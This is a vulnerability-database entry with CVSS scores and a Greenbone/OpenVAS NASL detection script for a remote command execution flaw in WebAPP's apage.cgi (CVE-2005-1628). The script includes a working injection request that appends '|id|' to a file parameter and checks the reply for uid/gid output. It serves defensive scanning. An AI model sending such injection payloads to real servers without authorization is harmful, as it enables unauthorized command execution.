7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
6.6 Medium
AI Score
Confidence
Low
0.047 Low
EPSS
Percentile
92.7%
Due to a lack of user input validation, an attacker can exploit the
# SPDX-FileCopyrightText: 2005 David Maciejak
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.18292");
script_version("2023-08-01T13:29:10+0000");
script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_cve_id("CVE-2005-1628");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/13637");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("WebAPP Apage.CGI remote command execution flaw");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2005 David Maciejak");
script_family("Web application abuses");
script_dependencies("webapp_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("WebAPP/installed");
script_tag(name:"solution", value:"Upgrade to WebAPP version 0.9.9.2 or newer.");
script_tag(name:"summary", value:"Due to a lack of user input validation, an attacker can exploit the
'apage.cgi' script in the version of WebAPP on the remote host to
execute arbitrary commands on the remote host with the privileges of the web server.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
port = http_get_port(default:80);
install = get_kb_item(string("www/", port, "/webapp"));
if (isnull(install))
exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
dir = matches[2];
http_check_remote_code(
unique_dir:dir,
check_request:"/mods/apage/apage.cgi?f=file.htm.|id|",
check_result:"uid=[0-9]+.*gid=[0-9]+.*",
command:"id"
);
}